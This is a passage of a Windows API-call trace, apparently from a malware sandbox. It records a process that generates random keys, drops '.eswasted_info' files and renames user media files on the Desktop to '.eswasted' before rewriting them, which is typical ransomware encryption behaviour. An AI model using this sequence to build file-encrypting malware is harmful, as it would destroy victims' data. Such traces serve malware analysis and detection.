returned 0x204c [0071.840] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x204c) returned 0x2d0000 [0071.840] CloseHandle (hObject=0x120) returned 1 [0071.842] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.842] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.842] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.843] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.843] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.843] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.897] SetEndOfFile (hFile=0x110) returned 1 [0071.899] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.899] CloseHandle (hObject=0x110) returned 1 [0071.900] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.901] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed5f8 | out: hHeap=0x4a0000) returned 1 [0071.901] _aulldvrm () returned 0x0 [0071.901] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.901] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.901] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.901] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\8f_6H6R1m0gL.mp4") returned 85 [0071.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b4) returned 0x4ed440 [0071.902] lstrcpyW (in: lpString1=0x4ed4ea, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.902] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.902] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.902] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\8f_6H6R1m0gL.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\8f_6h6r1m0gl.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.903] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.904] SetEndOfFile (hFile=0x110) returned 1 [0071.904] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.904] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.904] lstrcpyW (in: lpString1=0x4ed4ea, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\8f_6H6R1m0gL.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\8f_6h6r1m0gl.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\8f_6H6R1m0gL.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\8f_6h6r1m0gl.mp4.eswasted")) returned 1 [0071.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\8f_6H6R1m0gL.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\8f_6h6r1m0gl.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.904] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.905] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xf8c [0071.905] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8c) returned 0x2d0000 [0071.905] CloseHandle (hObject=0x100) returned 1 [0071.906] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.907] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.907] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.907] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.908] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.908] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.916] SetEndOfFile (hFile=0x110) returned 1 [0071.918] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.918] CloseHandle (hObject=0x110) returned 1 [0071.919] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0071.919] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed818 | out: hHeap=0x4a0000) returned 1 [0071.919] _aulldvrm () returned 0x0 [0071.919] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.920] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.920] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\9V54AEQelFL4FOL.m4a") returned 88 [0071.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ba) returned 0x4ed440 [0071.920] lstrcpyW (in: lpString1=0x4ed4f0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.920] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.921] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.921] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\9V54AEQelFL4FOL.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\9v54aeqelfl4fol.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.922] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.924] SetEndOfFile (hFile=0x110) returned 1 [0071.924] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.924] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.924] lstrcpyW (in: lpString1=0x4ed4f0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\9V54AEQelFL4FOL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\9v54aeqelfl4fol.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\9V54AEQelFL4FOL.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\9v54aeqelfl4fol.m4a.eswasted")) returned 1 [0071.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\9V54AEQelFL4FOL.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\9v54aeqelfl4fol.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.925] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.925] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x12450 [0071.925] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12450) returned 0xb10000 [0071.925] CloseHandle (hObject=0xf8) returned 1 [0071.933] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.934] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.934] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.934] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.934] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.934] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.943] SetEndOfFile (hFile=0x110) returned 1 [0071.992] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.992] CloseHandle (hObject=0x110) returned 1 [0071.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0071.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed920 | out: hHeap=0x4a0000) returned 1 [0071.993] _aulldvrm () returned 0x0 [0071.993] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.994] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.994] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\ip1w.bmp") returned 77 [0071.994] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4e1368 [0071.994] lstrcpyW (in: lpString1=0x4e1402, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.994] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.994] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.995] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.995] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\ip1w.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\ip1w.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.007] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.008] SetEndOfFile (hFile=0x110) returned 1 [0072.008] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.008] lstrcpyW (in: lpString1=0x4e1402, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\ip1w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\ip1w.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\ip1w.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\ip1w.bmp.eswasted")) returned 1 [0072.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\ip1w.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\ip1w.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.009] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.009] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x56cf [0072.009] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x56cf) returned 0x2d0000 [0072.009] CloseHandle (hObject=0x100) returned 1 [0072.011] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.012] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.012] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.012] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.013] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.013] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.021] SetEndOfFile (hFile=0x110) returned 1 [0072.024] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.024] CloseHandle (hObject=0x110) returned 1 [0072.027] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0072.027] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e45c0 | out: hHeap=0x4a0000) returned 1 [0072.027] _aulldvrm () returned 0x0 [0072.027] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.028] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.028] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\pzoqg0oozmuylLsQG0.wav") returned 91 [0072.028] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c0) returned 0x4e1368 [0072.028] lstrcpyW (in: lpString1=0x4e141e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.028] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.028] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.029] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.029] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\pzoqg0oozmuylLsQG0.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\pzoqg0oozmuyllsqg0.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.029] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.030] SetEndOfFile (hFile=0x110) returned 1 [0072.030] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.030] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.030] lstrcpyW (in: lpString1=0x4e141e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\pzoqg0oozmuylLsQG0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\pzoqg0oozmuyllsqg0.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\pzoqg0oozmuylLsQG0.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\pzoqg0oozmuyllsqg0.wav.eswasted")) returned 1 [0072.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\pzoqg0oozmuylLsQG0.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\pzoqg0oozmuyllsqg0.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.031] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0072.031] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x71f8 [0072.031] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x71f8) returned 0x2d0000 [0072.031] CloseHandle (hObject=0x118) returned 1 [0072.033] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.034] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.034] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.034] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.035] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.035] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.080] SetEndOfFile (hFile=0x110) returned 1 [0072.082] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.082] CloseHandle (hObject=0x110) returned 1 [0072.083] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0072.083] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4edc40 | out: hHeap=0x4a0000) returned 1 [0072.083] _aulldvrm () returned 0x0 [0072.083] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.084] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.084] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\X-GAlYSZoEhf.mp3") returned 69 [0072.084] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x294) returned 0x4ebff0 [0072.084] lstrcpyW (in: lpString1=0x4ec07a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.084] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.084] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.085] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.085] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\X-GAlYSZoEhf.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\x-galyszoehf.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.086] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.087] SetEndOfFile (hFile=0x110) returned 1 [0072.087] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.087] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.087] lstrcpyW (in: lpString1=0x4ec07a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\X-GAlYSZoEhf.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\x-galyszoehf.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\X-GAlYSZoEhf.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js 